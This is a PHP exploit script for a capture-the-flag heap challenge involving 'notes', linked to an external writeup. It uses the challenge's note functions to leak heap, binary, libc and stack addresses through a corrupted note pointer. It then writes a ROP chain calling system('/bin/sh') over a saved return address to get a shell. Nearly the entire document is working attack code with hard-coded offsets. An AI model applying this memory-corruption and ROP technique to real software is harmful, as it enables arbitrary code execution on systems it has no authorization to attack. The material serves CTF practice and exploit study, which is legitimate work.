
https://uz56764.tistory.com/110

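<?php
// Exploit driver for a "note" heap challenge (see the linked writeup).
//
// The note primitives add_note / delete_note / view_note / edit_note come from
// the challenge environment and are NOT defined in this file, so this script
// only runs inside that environment.
//
// Every hard-coded offset below (heap, PIE, libc, stack) is specific to one
// build of the target and its libc.  The libc constants resemble Ubuntu 22.04
// glibc 2.35 values (system 0x50d60, "/bin/sh" 0x1d8698, pop rdi;ret 0x2a3e5)
// but that is an inference from the numbers — confirm them against the libc
// actually shipped with the target before relying on them; a wrong offset
// turns the chain into a crash rather than a shell.

// Fixed filler body used by every re-allocation of note 0 after the first.
// Kept byte-for-byte as in the original writeup: 48 x 'a', a NUL, then 31 x 'a'.
const FILLER = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00" . "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";

/**
 * Decode a 7-byte little-endian integer from $buf starting at byte $off.
 *
 * Seven bytes (not eight) are read because the leaked values are x86-64
 * user-space pointers whose top byte is zero.  Bytes past the end of $buf
 * count as 0, matching what ord() on an out-of-range offset produced in the
 * original, minus the warning.
 */
function leak_u56(string $buf, int $off): int
{
    $value = 0;
    for ($i = 6; $i >= 0; $i--) {
        $byte = isset($buf[$off + $i]) ? ord($buf[$off + $i]) : 0;
        $value = ($value << 8) | $byte;
    }
    return $value;
}

/**
 * Pack a 64-bit value as little-endian: low dword, then high dword.
 *
 * Equivalent to pack('P') for the non-negative addresses used here; written
 * as two 'V' packs to stay identical to the original encoding.
 */
function p64(int $value): string
{
    return pack('V', $value & 0xffffffff) . pack('V', $value >> 32);
}

/**
 * Print a computed address in the original "label : value" (decimal) format.
 */
function report(string $label, int $value): void
{
    echo $label . " : " . $value . "\n";
}

/**
 * Free note 0 and re-create it with FILLER, 0xff, seven NULs and $addr.
 *
 * Judging by the view_note(1) / edit_note(1) calls that follow each use,
 * this appears to overwrite note 1's data pointer through the chunk that
 * note 0's free() released (i.e. it is the arbitrary read/write primitive).
 * That mechanism is not visible in this file — confirm against the challenge
 * binary before changing the body layout.
 */
function point_note1_at(int $addr): void
{
    delete_note(0);
    add_note("x1", FILLER . "\xff" . str_repeat("\x00", 7) . p64($addr));
}

echo "BREAKPOINT\n";

// Stage 0: initial layout — note 0 with a 65-byte body, note 1 with 8 bytes.
add_note("x1", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00" . "aaaaaaaaaaaaaaaa");
add_note("x2", "bbbbbbbb");

// Stage 1: heap leak.  Note 0 is re-allocated with a body ending in 0xff and
// viewing note 1 then exposes a heap pointer at bytes 8..14.  The +0x8 - 0x1000
// and +0x1fe0 adjustments are build-specific (taken from the writeup).
delete_note(0);
add_note("x1", FILLER . "\xff");

$buf = view_note(1);
$lic = leak_u56($buf, 8) + 0x8 - 0x1000;
report("lic", $lic);

$heap_to_base = $lic + 0x1fe0;
report("heap_to_base", $heap_to_base);

// Stage 2: read a PIE pointer from the heap to recover the binary base.
point_note1_at($heap_to_base);
$pie_base = leak_u56(view_note(1), 0) - 0x16f200;
report("pie_base", $pie_base);

// Stage 3: read a libc pointer from the binary (pie_base + 0x544ff0, likely a
// GOT slot — inferred) and subtract that symbol's libc offset.
$base_to_libc = $pie_base + 0x544ff0;
report("base_to_libc", $base_to_libc);

point_note1_at($base_to_libc);
$libc_base = leak_u56(view_note(1), 0) - 0x29dc0;
report("libc_base", $libc_base);

// Stage 4: read a stack pointer.  The writeup labels this location "environ";
// the 0xb2f2d0 - 8192 offset is not a standard glibc environ offset, so treat
// the name as the author's and verify the address on the target.
$environ = $libc_base + 0xb2f2d0 - 8192;
report("environ", $environ);

point_note1_at($environ);
$stack = leak_u56(view_note(1), 0);
report("stack", $stack);

// Stage 5: build the ROP chain:  pop rdi; ret  ->  "/bin/sh"  ->  ret  ->  system.
// The extra bare `ret` (gadget + 1, skipping the pop if 0x2a3e5 is the usual
// 5f c3 encoding) keeps the stack 16-byte aligned when system() is entered.
$gadget = $libc_base + 0x000000000002a3e5;
report("gadget", $gadget);
$rop_1 = p64($gadget);

$binsh = $libc_base + 0x1d8698;
report("binsh", $binsh);
$rop_2 = p64($binsh);

$system = $libc_base + 0x50d60;
report("system", $system);
$rop_3 = p64($system);

$gadget2 = $libc_base + 0x000000000002a3e5 + 1;
report("gadget2", $gadget2);   // fixed: the original printed $gadget under this label
$rop_4 = p64($gadget2);

// Stage 6: write the chain over the saved return address at stack - 0x3a48.
// Slots are written from the highest offset down so the return address itself
// (offset 0) is the last thing touched, exactly as in the original sequence.
$ret_slot = $stack - 0x3a48;
$chain = [
    0x18 => $rop_3,   // system
    0x10 => $rop_4,   // ret (alignment)
    0x08 => $rop_2,   // "/bin/sh"
    0x00 => $rop_1,   // pop rdi; ret
];
foreach ($chain as $offset => $qword) {
    $ret = $ret_slot + $offset;
    report("ret", $ret);
    point_note1_at($ret);
    edit_note(1, $qword);
}

echo "END";

?>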
Original writeup (https://uz56764.tistory.com/110).